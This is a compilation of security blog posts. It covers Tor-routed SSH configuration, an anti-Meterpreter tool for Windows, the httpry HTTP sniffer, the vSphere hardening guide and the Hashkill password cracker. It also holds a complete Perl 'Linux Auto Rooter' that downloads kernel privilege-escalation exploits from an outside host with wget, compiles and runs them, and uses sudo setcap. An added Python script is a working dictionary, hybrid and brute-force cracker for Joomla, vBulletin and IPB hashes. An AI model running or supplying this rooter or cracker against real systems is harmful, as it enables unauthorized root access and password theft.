Anonymous SSH Sessions With TOR

Source: http://www.howtoforge.com/anonymous-ssh-sessions-with-tor

OpenSSH does a good job of protecting a connection from being sniffed, but that is not always enough: the mere fact that you connected to a particular server can be incriminating, and SSH has no native way to hide where it connects. What it does offer is the ability to route the connection through a proxy, and this is where TOR comes into play. This howto covers installing TOR on a Debian-based system and setting up SSH to use it.

Installing TOR

First add the TOR repository to your system. This is only necessary if there is no tor package in your distribution's default repositories.

Add the following line to your /etc/apt/sources.list file. You have to replace lenny with your distribution.

deb http://mirror.noreply.org/pub/tor lenny main

To use this repository without problems, you have to add the PGP key to your system.

apt-key adv --recv-keys --keyserver subkeys.pgp.net 0x94C09C7F

Update your repositories and install TOR.

apt-get update && apt-get install -y tor

If you want to use TOR with OpenSSH, you have to install another program called connect-proxy.

apt-get install -y connect-proxy

Setup OpenSSH to use TOR for all connections

This is not recommended, because every SSH connection you make, including ones you would rather not send through TOR, is affected, but here is how it works.

Add the following block to the top of your ~/.ssh/config file.

Host *
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

The ssh command line does not change at all. Note what the ProxyCommand does: connect -4 speaks SOCKS4, which only accepts an IP address, so the host name is first turned into an address with tor-resolve, and that lookup goes through TOR's SOCKS port (localhost:9050) rather than through your local resolver, so the destination name does not show up in your DNS traffic.

Set up OpenSSH to use TOR for a specific connection

I recommend using TOR only for a specific connection. All other connections won’t be affected.

Add this block to your ~/.ssh/config. You have to replace mydomain with the host domain name or IP address and myaccount with your user name.

Host mydomain
HostName mydomain.com
User myaccount
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

Set up OpenSSH to use TOR for a bunch of connections

Instead of setting up TOR for every single connection, you can do it for a group of connections at once. The following example shows how it works.

Host anon_*
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p
Host anon_mydomain
HostName mydomain.com
User myaccount
Host anon_mydomain2
HostName mydomain2.com
User myaccount
Port 980

This way you always know whether you are using TOR or not: any alias starting with anon_ goes through TOR, and everything else connects directly.
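The three configurations above all rely on how ssh_config matches Host patterns and picks option values (the first value obtained wins, so the generic anon_* block has to come before the per-host blocks). The following script is an added example, not part of the howtoforge tutorial or of OpenSSH: it reads the anon_* block from above, works out which options apply to a given alias the way ssh does, expands the %h and %p tokens in the ProxyCommand, and reports whether the connection goes through the local TOR SOCKS port and whether the name lookup goes through TOR as well. The pattern matching uses fnmatch, which is a close enough stand-in for ssh's * and ? globbing for this purpose.

```python
"""Resolve the effective ~/.ssh/config options for a host alias and report
whether that connection is routed through the local Tor SOCKS port."""
import fnmatch
import re

# Config text copied from the anon_* block in the tutorial above.
SAMPLE_CONFIG = """\
Host anon_*
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p
Host anon_mydomain
HostName mydomain.com
User myaccount
Host anon_mydomain2
HostName mydomain2.com
User myaccount
Port 980
"""

# "Key value" or "Key=value"; keywords are case-insensitive in ssh_config.
LINE_RE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*?)\s*$")


def parse_ssh_config(text):
    """Return [(host_patterns, {option: value}), ...] in file order.
    Options that appear before the first Host line apply to every host."""
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "host":
            blocks.append((value.split(), {}))
        else:
            blocks[-1][1].setdefault(key, value)   # first occurrence in a block wins
    return blocks


def host_matches(alias, patterns):
    """ssh matches the alias typed on the command line (not HostName) against
    the Host patterns; a negated pattern (!pat) vetoes the whole block."""
    matched = False
    for pat in patterns:
        if pat.startswith("!"):
            if fnmatch.fnmatchcase(alias, pat[1:]):
                return False
        elif fnmatch.fnmatchcase(alias, pat):
            matched = True
    return matched


def effective_options(alias, text=SAMPLE_CONFIG):
    """ssh keeps the first value obtained for each option, so blocks earlier in
    the file win; that is why the generic anon_* block comes first."""
    opts = {}
    for patterns, block in parse_ssh_config(text):
        if host_matches(alias, patterns):
            for key, value in block.items():
                opts.setdefault(key, value)
    opts.setdefault("hostname", alias)   # ssh defaults HostName to the alias
    opts.setdefault("port", "22")
    return opts


def expand_tokens(command, opts):
    """Substitute the %h, %p and %r tokens ssh expands inside ProxyCommand."""
    return (command.replace("%%", "\0")
                   .replace("%h", opts["hostname"])
                   .replace("%p", opts["port"])
                   .replace("%r", opts.get("user", ""))
                   .replace("\0", "%"))


def tor_report(alias, text=SAMPLE_CONFIG):
    """Describe where `ssh alias` would really connect and how."""
    opts = effective_options(alias, text)
    proxy = opts.get("proxycommand", "")
    return {
        "alias": alias,
        "target": f"{opts['hostname']}:{opts['port']}",
        "proxy_command": expand_tokens(proxy, opts) if proxy else None,
        # 9050 is Tor's default SOCKS listener; no proxy means a direct TCP connection.
        "via_tor": re.search(r"\b(localhost|127\.0\.0\.1):9050\b", proxy) is not None,
        # tor-resolve performs the lookup through Tor, so the name never reaches the local resolver.
        "dns_via_tor": "tor-resolve" in proxy,
    }


if __name__ == "__main__":
    for alias in ("anon_mydomain", "anon_mydomain2", "mydomain2.com"):
        print(tor_report(alias))
```

On a real system the equivalent check is `ssh -G anon_mydomain2`, which prints the options OpenSSH itself would apply; the script above is useful when you want to audit a config file without running ssh, or to confirm that a bare host name like mydomain2.com (which does not match anon_*) would go out directly.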

Conclusion

It is very simple to anonymize your SSH sessions if you know what you're doing. I've written this tutorial for legal purposes only. Use it at your own risk.

Antimeter Tool – Anti Meterpreter (Metasploit) for Windows

A defensive tool against Metasploit's Meterpreter.

Link: http://www.mertsarica.com/codes/antimeter2.zip

USAGE

Code:

antimeter.exe [arguments]

Optional arguments:
-t [time interval] Scans memory every specified time interval (the default interval is one (1) minute)
-a Automatically kills the Meterpreter process (disabled by default)
-d Only detects the Meterpreter process (disabled by default)
-e Adds processes to the exclusion list (i.e. processes that are never scanned)

EXAMPLES
Scans memory every 5 minutes, kills the Meterpreter process automatically, with verbose mode enabled:

Code:

antimeter.exe -t 5 -a -v

Scans memory every minute and only detects the Meterpreter process:

Code:

antimeter.exe -n

Scans memory every minute, with the processes explorer.exe and winlogon.exe excluded from the analysis:

Code:

antimeter.exe -e explorer.exe,winlogon.exe

So the question: why use a tool like this when I use Linux or Mac, for example?

The answer is "BECAUSE!!!". Joking aside, in large, heterogeneous environments there is a strong tendency to have Windows servers and desktops.

So if that is your case, here is a solution for an OS as weak as Windows (the OS itself, in this case!)

@firebitsbr

Note: there is already a Metasploit script that is anti-antimeterpreter, but... never mind ;)

httpry – is a specialized packet sniffer designed for displaying and logging HTTP traffic

httpry

Current version: 0.1.5


core program

httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.

What can you do with it? Here’s a few ideas:

  • See what users on your network are requesting online
  • Check for proper server configuration (or improper, as the case may be)
  • Research patterns in HTTP usage
  • Watch for dangerous downloaded files
  • Verify the enforcement of HTTP policy on your network
  • Extract HTTP statistics out of saved capture files
  • It’s just plain fun to watch in realtime

Here’s an example of the log file output using the default output format string:

# httpry version 0.1.5
# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:32 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /intl/en_ALL/images/logo.gif HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /extern_js/f/CgJlbhICdXMrMAo4DSwrMA44AywrMBg4Ayw/AQ-hC7_2R8g.js HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.173.101 > GET clients1.google.com /generate_204 HTTP/1.1 - -
2009-01-12 15:02:33 209.85.173.101 192.168.0.16 < - - - HTTP/1.1 204 No Content

parsing scripts

Of course, the fun of collecting data is finding ways to analyze it. The log files are designed to be easily parsed by command line utilities, but sometimes you need to dig a little deeper. Complementing the core httpry program is a set of parsing scripts for mining information out of generated log files. Most of these scripts are written as plugins for a core parsing script and include functionality for extracting search terms, searching for specified terms within client flows, and outputting the logs in XML among other things. It is relatively straightforward to write custom plugins for additional parsing tasks.
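As an added example of the kind of parsing the paragraph above describes (this is not one of httpry's own scripts, which are written in Perl), the following Python reads the default output format shown in the example log, pairs the fields with the names from the Fields header, and pulls out the statistics a reader usually wants first: requests per host and per client, response codes, and requests for file types you want to watch. The sample input is the log shown above plus one constructed request for files.example.net so that the download check has something to find; the watch-list of extensions is an assumption, not something httpry defines.

```python
"""Parse httpry's default log format (see the Fields line above) and pull a
few statistics out of it, in the spirit of httpry's own parsing scripts."""
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# The lines from the example log output above, plus one constructed request
# (files.example.net) so that the download check below has something to find.
SAMPLE_LOG = """\
# httpry version 0.1.5
# Fields: timestamp,source-ip,dest-ip,direction,method,host,request-uri,http-version,status-code,reason-phrase
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:31 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:32 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com / HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /intl/en_ALL/images/logo.gif HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.171.103 > GET www.google.com /extern_js/f/CgJlbhICdXMrMAo4DSwrMA44AywrMBg4Ayw/AQ-hC7_2R8g.js HTTP/1.1 - -
2009-01-12 15:02:33 209.85.171.103 192.168.0.16 < - - - HTTP/1.1 200 OK
2009-01-12 15:02:33 192.168.0.16 209.85.173.101 > GET clients1.google.com /generate_204 HTTP/1.1 - -
2009-01-12 15:02:33 209.85.173.101 192.168.0.16 < - - - HTTP/1.1 204 No Content
2009-01-12 15:03:01 192.168.0.16 203.0.113.5 > GET files.example.net /tools/update.exe?v=2 HTTP/1.1 - -
"""


@dataclass
class Record:
    timestamp: str
    src: str
    dst: str
    direction: str            # ">" client request, "<" server response
    method: Optional[str]
    host: Optional[str]
    uri: Optional[str]
    version: Optional[str]
    status: Optional[int]
    reason: Optional[str]


def field(token):
    """httpry writes '-' for fields that do not apply to this direction."""
    return None if token == "-" else token


def parse_line(line):
    """Return a Record, or None for comment, blank and malformed lines.
    The timestamp is two tokens and the reason phrase may contain spaces
    ('No Content'), so split into at most 11 pieces; this works whether the
    separator is a tab (real httpry output) or spaces (as rendered above)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, 10)
    if len(parts) != 11 or parts[4] not in (">", "<"):
        return None
    date, time, src, dst, direction, method, host, uri, version, status, reason = parts
    return Record(
        timestamp=f"{date} {time}", src=src, dst=dst, direction=direction,
        method=field(method), host=field(host), uri=field(uri),
        version=field(version),
        status=int(status) if status.isdigit() else None,
        reason=field(reason),
    )


def parse_log(text):
    return [rec for rec in map(parse_line, text.splitlines()) if rec is not None]


def summarize(records):
    """Counts a reader of the log usually wants first."""
    requests = [r for r in records if r.direction == ">"]
    responses = [r for r in records if r.direction == "<"]
    return {
        "requests": len(requests),
        "responses": len(responses),
        "by_host": Counter(r.host for r in requests),
        "by_client": Counter(r.src for r in requests),
        "by_status": Counter(r.status for r in responses),
    }


# Assumed watch-list for "dangerous downloaded files"; adjust to your own policy.
SUSPICIOUS_EXTENSIONS = (".exe", ".scr", ".dll", ".msi", ".bat", ".ps1")


def flag_downloads(records, extensions=SUSPICIOUS_EXTENSIONS):
    """Requests whose URI path (query string ignored) ends in a watched extension."""
    hits = []
    for r in records:
        if r.direction == ">" and r.uri:
            path = r.uri.split("?", 1)[0].lower()
            if path.endswith(extensions):
                hits.append((r.timestamp, r.src, r.host, r.uri))
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print(summarize(recs))
    for hit in flag_downloads(recs):
        print("download:", *hit)
```

Because the default format has no connection identifier, requests and responses can only be paired heuristically (same address pair, response after request); httpry's own content-analysis plugin handles that with a sliding window over flows, as noted in the release news below, and this script deliberately stops short of it.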

latest news

There are several major enhancements in the latest version of httpry. The two major added features are SIGHUP handling for gracefully reopening output files (thanks to Philipp for providing a patch with this functionality) and defaulting output files to line buffering (partly related to the same patch, but also requested by several other users). In addition, there is a new binary pcap dump file option, and both “source-port” and “dest-port” were added as available output fields.

Important Note! The command line switch for specifying a format string was changed from -s to -f to make it more mnemonic. If you have any scripts that use this switch, be sure to update them accordingly.

The Perl log parsing scripts were also updated significantly for this release. Across all plugins, the init() and end() calls are now executed with eval() to make them more resilient to errors. There is also a new list() function added to each plugin that allows it to specify required fields in the input file. If the fields aren’t present then the plugin will be disabled. The content analysis plugin was also substantially rewritten to use a sliding window to specify flows instead of time delimiting them.

Download httpry 0.1.5

If you are using FreeBSD, you can also get httpry as a FreeBSD port.


2011 Linux Auto Rooter Beta 1.0 Coded by CrosS

This Perl script downloads a handful of C exploits, compiles them with GCC and runs them, in an attempt to find a working privilege escalation in the Linux kernel (kernels 2.6.18, 2.6.33, 2.6.34, 2.6.37-rc2, 2.6.37, 2.6.43.2, 3.0).

In reality it only automates the process of testing each C exploit, which could just as well be done by compiling and running them by hand. Note that every exploit is fetched over plain HTTP from r00tw0rm.com and executed without any integrity check (two of them after a sudo setcap), so whoever controls that host, or the network path to it, controls what runs on the machine.

#!/usr/bin/perl
#Coded By CrosS ( 2011 Linux Auto r00t3r )
print "###########################################################\n";
print "#             (Beta 1.0 )   Auto rooter by CrosS           #\n";
print "#  Usage :                                                 #\n";
print "#    perl $0 root    => To root            #\n";
print "#    perl $0 del     => Delete Exploit     #\n";
print "#                                                          #\n";
print "#       as R00TW0RM - Private Community is back            #\n";
print "#                  so Releasing 2011 auto rooter =)        #\n";
print "#   in case of error mailto: mr.0x0day[AT]live.com         #\n";
print "#                                                          #\n";
print "#        Thanks to: r0073r and L0rd CrusAd3r               #\n";
print "#              http://www.r00tw0rm.com/forum               #\n";
print "###########################################################\n\n\n";

if ($ARGV[0] =~ "root" )
{
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://www.r00tw0rm.com/2o11Expl01t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");
}

This script was developed by CrosS to exploit vulnerabilities in a number of Linux kernel versions in order to escalate privileges and become ROOT.

@firebitsbr

VMware vSphere 4.1 security hardening guide

This document is the official release of the vSphere 4.1 Security Hardening Guide.  This version is based on feedback collected during the public draft comment period.  We will still be collecting feedback on this document — if there are any typos, errors, or changes, please add them to the comments below.

This set of documents provides guidance on how to securely deploy VMware® vSphere™ 4.1 (“vSphere”) in a production environment. The focus is on initial configuration of the virtualization infrastructure layer, which covers the following:

  • The virtualization hosts (both VMware ESX® 4 and VMware ESXi™ 4)
  • Configuration of the virtual machine container (NOT hardening of the guest operating system (OS) or any applications running within)
  • Configuration of the virtual networking infrastructure, including the management and storage networks as well as the virtual switch (but NOT security of the virtual machine’s network)
  • VMware vCenter™ Server, its database and client components
  • VMware Update Manager (included because the regular update and patching of the ESX/ESXi hosts and the virtual machine containers are essential to maintaining the security of the environment)

The following are specifically out of scope and are NOT covered:

  • Security of the software running inside the virtual machine, such as OS and applications, and the traffic traveling through the virtual machine networks
  • Security of any other add-on products, such as SRM
  • Detailed operational procedures related to maintaining security, such as event monitoring, auditing and privilege management. Guidance is provided on general areas in which to perform these important tasks, but details on exactly how to perform them are out of scope.

Download : http://communities.vmware.com/docs/DOC-15413

Hashkill A Multithreaded Open Source Password Cracker

Hashkill is a multi-threaded open source password cracker. It uses the OpenSSL library to crack different types of password hashes, and supports plugins, so new hash types and services can be added. Its features are:

  • Supports 4 modes (bruteforce, dictionary, hybrid, markov)
  • multithreaded
  • 31 plugins for different hash types, including zip passwords, SSH passphrases, etc.
  • session autosave/resume
  • SSE2-accelerated


The following plugins are currently available:

  1. apr1 – Apache apr1 plugin
  2. cisco-pix – Cisco PIX password hashes plugin
  3. desunix – DES(Unix) plugin (.htpasswd)
  4. hashunix – MD5(Unix)/SHA256(Unix)/SHA512(Unix) plugin (shadow files)
  5. ipb2 – md5(md5(salt).md5(pass)) plugin (IPB > 2.x)
  6. ldap-sha – LDAP SHA plugin
  7. ldap-ssha – LDAP SSHA (salted SHA) plugin
  8. lm – LM plugin
  9. md4 – MD4 plugin
  10. md5-passsalt – md5(password,salt) plugin (joomla)
  11. md5-saltpass – md5(salt,password) plugin (osCommerce)
  12. md5 – MD5 plugin
  13. md5md5 – md5(md5(pass)) plugin
  14. mssql-2000 – Microsoft SQL Server 2000 plugin
  15. mssql-2005 – Microsoft SQL Server 2005 plugin
  16. mysql-old – MySQL < 4.1 plugin
  17. mysql5 – MySQL > 4.1 plugin
  18. ntlm – NTLM plugin
  19. oracle-old – Oracle 7 up to 10r2 plugin
  20. oracle11g – Oracle 11g plugin
  21. phpbb3 – phpBB3 hashes plugin
  22. privkey – SSH/SSL private key passphrase plugin
  23. ripemd160 – RIPEMD-160 plugin
  24. sha1 – SHA1 plugin
  25. sha1sha1 – sha1(sha1(pass)) plugin
  26. sha256 – SHA-256 plugin
  27. sha512 – SHA-512 plugin
  28. smf – SMF plugin
  29. vbulletin – md5(md5(pass).salt) plugin
  30. wordpress – WordPress hashes plugin
  31. zip – ZIP passwords plugin
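To make the plugin list and the four modes concrete, here is an added example (written for this page, not Hashkill's own code, which is C): a miniature cracker in which each "plugin" is just the hash construction named above (md5(pass.salt) for Joomla, md5(md5(pass).salt) for vBulletin, md5(md5(salt).md5(pass)) for IPB2, and so on) and the dictionary, hybrid and brute-force modes are candidate generators plugged into one matching loop. Markov mode is left out because it needs a trained character-statistics table. The wordlist and target hashes are constructed inline; nested digests are fed to the outer hash as lowercase hex text, which is how these web applications store them.

```python
"""A miniature hashkill: the hash constructions from the plugin list above,
fed by dictionary, hybrid and brute-force candidate generators."""
import hashlib
import itertools
import string
from typing import Iterable, Iterator, Optional


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def sha1_hex(data: bytes) -> str:
    return hashlib.sha1(data).hexdigest()


# One entry per construction named in the plugin list: (password, salt) -> hex digest.
PLUGINS = {
    "md5":          lambda p, s: md5_hex(p),
    "sha1":         lambda p, s: sha1_hex(p),
    "md5md5":       lambda p, s: md5_hex(md5_hex(p).encode()),              # md5(md5(pass))
    "sha1sha1":     lambda p, s: sha1_hex(sha1_hex(p).encode()),            # sha1(sha1(pass))
    "md5-passsalt": lambda p, s: md5_hex(p + s),                            # joomla
    "md5-saltpass": lambda p, s: md5_hex(s + p),                            # osCommerce
    "vbulletin":    lambda p, s: md5_hex(md5_hex(p).encode() + s),          # md5(md5(pass).salt)
    "ipb2":         lambda p, s: md5_hex(md5_hex(s).encode() + md5_hex(p).encode()),  # md5(md5(salt).md5(pass))
}


def dictionary_mode(words: Iterable[str]) -> Iterator[bytes]:
    """Try each wordlist entry as-is."""
    for word in words:
        yield word.encode()


def hybrid_mode(words: Iterable[str], charset: str = string.digits,
                max_suffix: int = 2) -> Iterator[bytes]:
    """Each wordlist entry followed by 0..max_suffix characters from charset
    (summer, summer1, ..., summer99)."""
    for word in words:
        base = word.encode()
        for n in range(max_suffix + 1):
            for tail in itertools.product(charset, repeat=n):
                yield base + "".join(tail).encode()


def bruteforce_mode(charset: str = string.ascii_lowercase,
                    max_len: int = 4) -> Iterator[bytes]:
    """Every string over charset up to max_len, shortest first."""
    for n in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo).encode()


def crack(target_hex: str, plugin: str, candidates: Iterable[bytes],
          salt: bytes = b"") -> Optional[str]:
    """Return the first candidate whose digest matches target_hex, or None.
    A real cracker hashes candidates in batches across threads; the loop is
    the same, only the throughput differs."""
    target = target_hex.lower()
    digest = PLUGINS[plugin]
    for cand in candidates:
        if digest(cand, salt) == target:
            return cand.decode("utf-8", "replace")
    return None


if __name__ == "__main__":
    # Constructed targets: hash a known password, then recover it.
    wordlist = ["password", "letmein", "summer", "hunter2"]
    vb = md5_hex(md5_hex(b"hunter2").encode() + b"x9")
    print("vbulletin :", crack(vb, "vbulletin", dictionary_mode(wordlist), salt=b"x9"))
    print("hybrid    :", crack(md5_hex(b"summer19"), "md5", hybrid_mode(wordlist)))
    print("bruteforce:", crack(sha1_hex(b"abc"), "sha1", bruteforce_mode(max_len=3)))
```

The salted plugins make the practical point behind the list: a per-user salt does not slow down a single guess at all, it only prevents one candidate hash from being compared against every user's hash at once, which is why unsalted entries (md5, sha1, md5md5) fall fastest.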


Download hashkill v0.2.3b.
http://sourceforge.net/projects/hashkill/files/